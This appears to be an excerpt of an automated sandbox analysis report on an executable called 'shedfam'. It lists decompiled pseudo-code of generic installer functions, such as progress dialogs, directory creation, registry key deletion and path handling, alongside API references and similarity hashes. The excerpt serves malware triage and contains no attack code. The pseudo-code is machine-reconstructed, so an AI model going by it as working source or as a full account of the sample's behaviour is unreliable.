                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: Message$Send$ClientScreen
                                                                  • String ID: f
                                                                  • API String ID: 41195575-1993550816
                                                                  • Opcode ID: b999d07b324019c2219c33d3107ce818a81de0efbbfc0766a2ac4245d0efef5f
                                                                  • Instruction ID: 15d2046a7114e84a1294b603ac72faee52eeac06783d2b716c70649c054a36c5
                                                                  • Opcode Fuzzy Hash: b999d07b324019c2219c33d3107ce818a81de0efbbfc0766a2ac4245d0efef5f
                                                                  • Instruction Fuzzy Hash: B0014071D00219BADB00DBA4DC45BFFBBBCAB99711F10412ABB10B62D0D7B465018BA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E00402B51(struct HWND__* _a4, intOrPtr _a8) {
                                                                  				char _v68;
                                                                  				void* _t11;
                                                                  				CHAR* _t19;
                                                                  
                                                                  				if(_a8 == 0x110) {
                                                                  					SetTimer(_a4, 1, 0xfa, 0);
                                                                  					_a8 = 0x113;
                                                                  				}
                                                                  				if(_a8 == 0x113) {
                                                                  					_t11 = E00402BCD();
                                                                  					_t19 = "unpacking data: %d%%";
                                                                  					if( *0x423f90 == 0) {
                                                                  						_t19 = "verifying installer: %d%%";
                                                                  					}
                                                                  					wsprintfA( &_v68, _t19, _t11);
                                                                  					SetWindowTextA(_a4,  &_v68);
                                                                  					SetDlgItemTextA(_a4, 0x406,  &_v68);
                                                                  				}
                                                                  				return 0;
                                                                  			}






                                                                  0x00402b5e
                                                                  0x00402b6c
                                                                  0x00402b72
                                                                  0x00402b72
                                                                  0x00402b80
                                                                  0x00402b82
                                                                  0x00402b8e
                                                                  0x00402b93
                                                                  0x00402b95
                                                                  0x00402b95
                                                                  0x00402ba0
                                                                  0x00402bb0
                                                                  0x00402bc2
                                                                  0x00402bc2
                                                                  0x00402bca

                                                                  APIs
                                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B6C
                                                                  • wsprintfA.USER32 ref: 00402BA0
                                                                  • SetWindowTextA.USER32(?,?), ref: 00402BB0
                                                                  • SetDlgItemTextA.USER32 ref: 00402BC2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                  • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                  • API String ID: 1451636040-1158693248
                                                                  • Opcode ID: e689fdde44cf42a9b67182cf282a3bc8b5e9150859d8beb6a9b489f4c8dfea69
                                                                  • Instruction ID: 5842f070d0ba5c42680e32cc71ffb7420e94a61e96bc0cd7dd222547cc7ec007
                                                                  • Opcode Fuzzy Hash: e689fdde44cf42a9b67182cf282a3bc8b5e9150859d8beb6a9b489f4c8dfea69
                                                                  • Instruction Fuzzy Hash: 63F01D70900209ABEF206F60DD0ABEE3B79AB00305F00803AFA16B51D1D7B8AA558F59
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E004054A9(CHAR* _a4) {
                                                                  				struct _SECURITY_ATTRIBUTES _v16;
                                                                  				struct _SECURITY_DESCRIPTOR _v36;
                                                                  				long _t23;
                                                                  
                                                                  				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                                  				_v36.Owner = 0x407310;
                                                                  				_v36.Group = 0x407310;
                                                                  				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                                  				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                                  				_v16.lpSecurityDescriptor =  &_v36;
                                                                  				_v36.Revision = 1;
                                                                  				_v36.Control = 4;
                                                                  				_v36.Dacl = 0x407300;
                                                                  				_v16.nLength = 0xc;
                                                                  				if(CreateDirectoryA(_a4,  &_v16) != 0) {
                                                                  					L1:
                                                                  					return 0;
                                                                  				}
                                                                  				_t23 = GetLastError();
                                                                  				if(_t23 == 0xb7) {
                                                                  					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
                                                                  						goto L1;
                                                                  					}
                                                                  					return GetLastError();
                                                                  				}
                                                                  				return _t23;
                                                                  			}






                                                                  0x004054b4
                                                                  0x004054b8
                                                                  0x004054bb
                                                                  0x004054c1
                                                                  0x004054c5
                                                                  0x004054c9
                                                                  0x004054d1
                                                                  0x004054d8
                                                                  0x004054de
                                                                  0x004054e5
                                                                  0x004054f4
                                                                  0x004054f6
                                                                  0x00000000
                                                                  0x004054f6
                                                                  0x00405500
                                                                  0x00405507
                                                                  0x0040551d
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040551f
                                                                  0x00405523

                                                                  APIs
                                                                  • CreateDirectoryA.KERNEL32(?,?,00000000), ref: 004054EC
                                                                  • GetLastError.KERNEL32 ref: 00405500
                                                                  • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405515
                                                                  • GetLastError.KERNEL32 ref: 0040551F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                  • String ID: C:\Users\user\Desktop
                                                                  • API String ID: 3449924974-1669384263
                                                                  • Opcode ID: 1936ad7c03f2b7d8793bf3b54e92df8b677be00562b78ee6b782fceed01fa342
                                                                  • Instruction ID: c62c2996f9e34dce87800cf524906665c2ca46c28120acb5782fde5c5d27446b
                                                                  • Opcode Fuzzy Hash: 1936ad7c03f2b7d8793bf3b54e92df8b677be00562b78ee6b782fceed01fa342
                                                                  • Instruction Fuzzy Hash: 2C010871D04219EAEF119FA5D9047EFBBB8EF04355F00457AE905B6180D378A644CBAA
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 84%
                                                                  			E00402A4C(void* _a4, char* _a8, intOrPtr _a12) {
                                                                  				void* _v8;
                                                                  				char _v272;
                                                                  				long _t18;
                                                                  				intOrPtr* _t27;
                                                                  				long _t28;
                                                                  
                                                                  				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x424030 | 0x00000008,  &_v8);
                                                                  				if(_t18 == 0) {
                                                                  					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
                                                                  						if(_a12 != 0) {
                                                                  							RegCloseKey(_v8);
                                                                  							L8:
                                                                  							return 1;
                                                                  						}
                                                                  						if(E00402A4C(_v8,  &_v272, 0) != 0) {
                                                                  							break;
                                                                  						}
                                                                  					}
                                                                  					RegCloseKey(_v8);
                                                                  					_t27 = E00406087(4);
                                                                  					if(_t27 == 0) {
                                                                  						if( *0x424030 != 0) {
                                                                  							goto L8;
                                                                  						}
                                                                  						_t28 = RegDeleteKeyA(_a4, _a8);
                                                                  						if(_t28 != 0) {
                                                                  							goto L8;
                                                                  						}
                                                                  						return _t28;
                                                                  					}
                                                                  					return  *_t27(_a4, _a8,  *0x424030, 0);
                                                                  				}
                                                                  				return _t18;
                                                                  			}








                                                                  0x00402a6d
                                                                  0x00402a75
                                                                  0x00402a9d
                                                                  0x00402a87
                                                                  0x00402ad7
                                                                  0x00402add
                                                                  0x00000000
                                                                  0x00402adf
                                                                  0x00402a9b
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00402a9b
                                                                  0x00402ab2
                                                                  0x00402aba
                                                                  0x00402ac1
                                                                  0x00402aed
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00402af5
                                                                  0x00402afd
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00402afd
                                                                  0x00000000
                                                                  0x00402ad0
                                                                  0x00402ae4

                                                                  APIs
                                                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A6D
                                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AA9
                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402AB2
                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402AD7
                                                                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AF5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: Close$DeleteEnumOpen
                                                                  • String ID:
                                                                  • API String ID: 1912718029-0
                                                                  • Opcode ID: e587360bee53e37b0855da719222600f70f6391bf1876ecc0db5f363fb6ea6fc
                                                                  • Instruction ID: 0b2809d2fb64695319acfce79e26d11160b3b4f997347cbf6297b20c5f533aea
                                                                  • Opcode Fuzzy Hash: e587360bee53e37b0855da719222600f70f6391bf1876ecc0db5f363fb6ea6fc
                                                                  • Instruction Fuzzy Hash: B3117F71A00009FFDF21AF90DE48DAF7B79EB44384B104076FA05B00A0DBB49E51AF69
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E00401CC1(int __edx) {
                                                                  				void* _t17;
                                                                  				struct HINSTANCE__* _t21;
                                                                  				struct HWND__* _t25;
                                                                  				void* _t27;
                                                                  
                                                                  				_t25 = GetDlgItem( *(_t27 - 8), __edx);
                                                                  				GetClientRect(_t25, _t27 - 0x50);
                                                                  				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A0C(_t21), _t21,  *(_t27 - 0x48) *  *(_t27 - 0x20),  *(_t27 - 0x44) *  *(_t27 - 0x20), 0x10));
                                                                  				if(_t17 != _t21) {
                                                                  					DeleteObject(_t17);
                                                                  				}
                                                                  				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t27 - 4));
                                                                  				return 0;
                                                                  			}







                                                                  0x00401ccb
                                                                  0x00401cd2
                                                                  0x00401d01
                                                                  0x00401d09
                                                                  0x00401d10
                                                                  0x00401d10
                                                                  0x004028a4
                                                                  0x004028b0

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                  • String ID:
                                                                  • API String ID: 1849352358-0
                                                                  • Opcode ID: ec194eb94e58c4ab6dd9346a1662fd327514f5b443aeead4144ae97423a1d297
                                                                  • Instruction ID: bd69cf0b23442afaa5089e63738db4ddecc40c485a2e91d601a614859fd6190e
                                                                  • Opcode Fuzzy Hash: ec194eb94e58c4ab6dd9346a1662fd327514f5b443aeead4144ae97423a1d297
                                                                  • Instruction Fuzzy Hash: 79F0FF72A04114AFDB00EBA4DD88DAFB77CFB44305B044536F601F6191C7789D419B79
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E00405882(char _a4) {
                                                                  				CHAR* _t3;
                                                                  				char* _t5;
                                                                  				CHAR* _t7;
                                                                  				CHAR* _t8;
                                                                  				void* _t10;
                                                                  
                                                                  				_t1 =  &_a4; // 0x405634
                                                                  				_t8 =  *_t1;
                                                                  				_t7 = CharNextA(_t8);
                                                                  				_t3 = CharNextA(_t7);
                                                                  				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
                                                                  					if( *_t8 != 0x5c5c) {
                                                                  						L8:
                                                                  						return 0;
                                                                  					}
                                                                  					_t10 = 2;
                                                                  					while(1) {
                                                                  						_t10 = _t10 - 1;
                                                                  						_t5 = E00405819(_t3, 0x5c);
                                                                  						if( *_t5 == 0) {
                                                                  							goto L8;
                                                                  						}
                                                                  						_t3 = _t5 + 1;
                                                                  						if(_t10 != 0) {
                                                                  							continue;
                                                                  						}
                                                                  						return _t3;
                                                                  					}
                                                                  					goto L8;
                                                                  				} else {
                                                                  					return CharNextA(_t3);
                                                                  				}
                                                                  			}








                                                                  0x0040588b
                                                                  0x0040588b
                                                                  0x00405892
                                                                  0x00405895
                                                                  0x0040589a
                                                                  0x004058ad
                                                                  0x004058c7
                                                                  0x00000000
                                                                  0x004058c7
                                                                  0x004058b1
                                                                  0x004058b2
                                                                  0x004058b5
                                                                  0x004058b6
                                                                  0x004058be
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004058c0
                                                                  0x004058c3
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004058c3
                                                                  0x00000000
                                                                  0x004058a3
                                                                  0x00000000
                                                                  0x004058a4

                                                                  APIs
                                                                  • CharNextA.USER32(4V@,?,C:\,00000000,004058E6,C:\,C:\,?,?,74D0F560,00405634,?,C:\Users\user\AppData\Local\Temp\,74D0F560), ref: 00405890
                                                                  • CharNextA.USER32(00000000), ref: 00405895
                                                                  • CharNextA.USER32(00000000), ref: 004058A4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: CharNext
                                                                  • String ID: 4V@$C:\
                                                                  • API String ID: 3213498283-1503405514
                                                                  • Opcode ID: c58660fb0bf1ba28bd125fae111134e2cdebdf6cff54c8abe05387ea08842000
                                                                  • Instruction ID: c672ca698b2e1da82c16c1c95d0afa497de5c4bc474b1e42a417a68fd1ebbade
                                                                  • Opcode Fuzzy Hash: c58660fb0bf1ba28bd125fae111134e2cdebdf6cff54c8abe05387ea08842000
                                                                  • Instruction Fuzzy Hash: 65F0A753954F2155F72232644C44B7B5BACDF55711F14C47BE900F61D182BC5CB28FAA
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 77%
                                                                  			E004047AC(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                                  				char _v36;
                                                                  				char _v68;
                                                                  				void* __ebx;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				signed int _t21;
                                                                  				signed int _t22;
                                                                  				void* _t29;
                                                                  				void* _t31;
                                                                  				void* _t32;
                                                                  				void* _t41;
                                                                  				signed int _t43;
                                                                  				signed int _t47;
                                                                  				signed int _t50;
                                                                  				signed int _t51;
                                                                  				signed int _t53;
                                                                  
                                                                  				_t21 = _a16;
                                                                  				_t51 = _a12;
                                                                  				_t41 = 0xffffffdc;
                                                                  				if(_t21 == 0) {
                                                                  					_push(0x14);
                                                                  					_pop(0);
                                                                  					_t22 = _t51;
                                                                  					if(_t51 < 0x100000) {
                                                                  						_push(0xa);
                                                                  						_pop(0);
                                                                  						_t41 = 0xffffffdd;
                                                                  					}
                                                                  					if(_t51 < 0x400) {
                                                                  						_t41 = 0xffffffde;
                                                                  					}
                                                                  					if(_t51 < 0xffff3333) {
                                                                  						_t50 = 0x14;
                                                                  						asm("cdq");
                                                                  						_t22 = 1 / _t50 + _t51;
                                                                  					}
                                                                  					_t23 = _t22 & 0x00ffffff;
                                                                  					_t53 = _t22 >> 0;
                                                                  					_t43 = 0xa;
                                                                  					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
                                                                  				} else {
                                                                  					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
                                                                  					_t47 = 0;
                                                                  				}
                                                                  				_t29 = E00405D1D(_t41, _t47, _t53,  &_v36, 0xffffffdf);
                                                                  				_t31 = E00405D1D(_t41, _t47, _t53,  &_v68, _t41);
                                                                  				_t32 = E00405D1D(_t41, _t47, 0x420580, 0x420580, _a8);
                                                                  				wsprintfA(_t32 + lstrlenA(0x420580), "%u.%u%s%s", _t53, _t47, _t31, _t29);
                                                                  				return SetDlgItemTextA( *0x423758, _a4, 0x420580);
                                                                  			}



















                                                                  0x004047b2
                                                                  0x004047b7
                                                                  0x004047bf
                                                                  0x004047c0
                                                                  0x004047cd
                                                                  0x004047d5
                                                                  0x004047d6
                                                                  0x004047d8
                                                                  0x004047da
                                                                  0x004047dc
                                                                  0x004047df
                                                                  0x004047df
                                                                  0x004047e6
                                                                  0x004047ec
                                                                  0x004047ec
                                                                  0x004047f3
                                                                  0x004047fa
                                                                  0x004047fd
                                                                  0x00404800
                                                                  0x00404800
                                                                  0x00404804
                                                                  0x00404814
                                                                  0x00404816
                                                                  0x00404819
                                                                  0x004047c2
                                                                  0x004047c2
                                                                  0x004047c9
                                                                  0x004047c9
                                                                  0x00404821
                                                                  0x0040482c
                                                                  0x00404842
                                                                  0x00404852
                                                                  0x0040486e

                                                                  APIs
                                                                  • lstrlenA.KERNEL32(00420580,00420580,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004046C7,000000DF,00000000,00000400,?), ref: 0040484A
                                                                  • wsprintfA.USER32 ref: 00404852
                                                                  • SetDlgItemTextA.USER32 ref: 00404865
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                  • String ID: %u.%u%s%s
                                                                  • API String ID: 3540041739-3551169577
                                                                  • Opcode ID: 79547ab418726b7bf4084acddcdfde422701d950c1d0e95393f539214d427545
                                                                  • Instruction ID: 71df96092b2c0d2c51d4f9b386e12500524326f2c654dceed31374545f8d5b50
                                                                  • Opcode Fuzzy Hash: 79547ab418726b7bf4084acddcdfde422701d950c1d0e95393f539214d427545
                                                                  • Instruction Fuzzy Hash: C411E77364412437DB0075699C46EAF3299DFC6374F244637FA25F31D2EA788C5285AC
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 51%
                                                                  			E00401BAD() {
                                                                  				signed int _t28;
                                                                  				CHAR* _t31;
                                                                  				long _t32;
                                                                  				int _t37;
                                                                  				signed int _t38;
                                                                  				int _t42;
                                                                  				int _t48;
                                                                  				struct HWND__* _t52;
                                                                  				void* _t55;
                                                                  
                                                                  				 *(_t55 - 8) = E004029EF(3);
                                                                  				 *(_t55 + 8) = E004029EF(4);
                                                                  				if(( *(_t55 - 0x14) & 0x00000001) != 0) {
                                                                  					 *((intOrPtr*)(__ebp - 8)) = E00402A0C(0x33);
                                                                  				}
                                                                  				__eflags =  *(_t55 - 0x14) & 0x00000002;
                                                                  				if(( *(_t55 - 0x14) & 0x00000002) != 0) {
                                                                  					 *(_t55 + 8) = E00402A0C(0x44);
                                                                  				}
                                                                  				__eflags =  *((intOrPtr*)(_t55 - 0x2c)) - 0x21;
                                                                  				_push(1);
                                                                  				if(__eflags != 0) {
                                                                  					_t50 = E00402A0C();
                                                                  					_t28 = E00402A0C();
                                                                  					asm("sbb ecx, ecx");
                                                                  					asm("sbb eax, eax");
                                                                  					_t31 =  ~( *_t27) & _t50;
                                                                  					__eflags = _t31;
                                                                  					_t32 = FindWindowExA( *(_t55 - 8),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
                                                                  					goto L10;
                                                                  				} else {
                                                                  					_t52 = E004029EF();
                                                                  					_t37 = E004029EF();
                                                                  					_t48 =  *(_t55 - 0x14) >> 2;
                                                                  					if(__eflags == 0) {
                                                                  						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8));
                                                                  						L10:
                                                                  						 *(_t55 - 0xc) = _t32;
                                                                  					} else {
                                                                  						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8), _t42, _t48, _t55 - 0xc);
                                                                  						asm("sbb eax, eax");
                                                                  						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
                                                                  					}
                                                                  				}
                                                                  				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - _t42;
                                                                  				if( *((intOrPtr*)(_t55 - 0x28)) >= _t42) {
                                                                  					_push( *(_t55 - 0xc));
                                                                  					E00405C59();
                                                                  				}
                                                                  				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t55 - 4));
                                                                  				return 0;
                                                                  			}












                                                                  0x00401bb6
                                                                  0x00401bc2
                                                                  0x00401bc5
                                                                  0x00401bce
                                                                  0x00401bce
                                                                  0x00401bd1
                                                                  0x00401bd5
                                                                  0x00401bde
                                                                  0x00401bde
                                                                  0x00401be1
                                                                  0x00401be5
                                                                  0x00401be7
                                                                  0x00401c34
                                                                  0x00401c36
                                                                  0x00401c3f
                                                                  0x00401c47
                                                                  0x00401c4a
                                                                  0x00401c4a
                                                                  0x00401c53
                                                                  0x00000000
                                                                  0x00401be9
                                                                  0x00401bf0
                                                                  0x00401bf2
                                                                  0x00401bfa
                                                                  0x00401bfd
                                                                  0x00401c25
                                                                  0x00401c59
                                                                  0x00401c59
                                                                  0x00401bff
                                                                  0x00401c0d
                                                                  0x00401c15
                                                                  0x00401c18
                                                                  0x00401c18
                                                                  0x00401bfd
                                                                  0x00401c5c
                                                                  0x00401c5f
                                                                  0x00401c65
                                                                  0x00402849
                                                                  0x00402849
                                                                  0x004028a4
                                                                  0x004028b0

                                                                  APIs
                                                                  • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                                                                  • SendMessageA.USER32 ref: 00401C25
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Timeout
                                                                  • String ID: !
                                                                  • API String ID: 1777923405-2657877971
                                                                  • Opcode ID: ffe6b110ca1c73326c48dab4d0f6c0cda1bf7de6d6394e86224bb1024c2cbccb
                                                                  • Instruction ID: 0d48d80f5befc11ac34d32cc8383790a8c4c8cfd5038d7f43494ad221661d07c
                                                                  • Opcode Fuzzy Hash: ffe6b110ca1c73326c48dab4d0f6c0cda1bf7de6d6394e86224bb1024c2cbccb
                                                                  • Instruction Fuzzy Hash: 4D217471A44248BFEF01AFB4CD8AAAE7B75EF44344F14417AF501B61D1D6788940DB19
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E004057EE(CHAR* _a4) {
                                                                  				CHAR* _t7;
                                                                  
                                                                  				_t7 = _a4;
                                                                  				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                                                                  					lstrcatA(_t7, 0x409010);
                                                                  				}
                                                                  				return _t7;
                                                                  			}




                                                                  0x004057ef
                                                                  0x00405806
                                                                  0x0040580e
                                                                  0x0040580e
                                                                  0x00405816

                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040323C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 004057F4
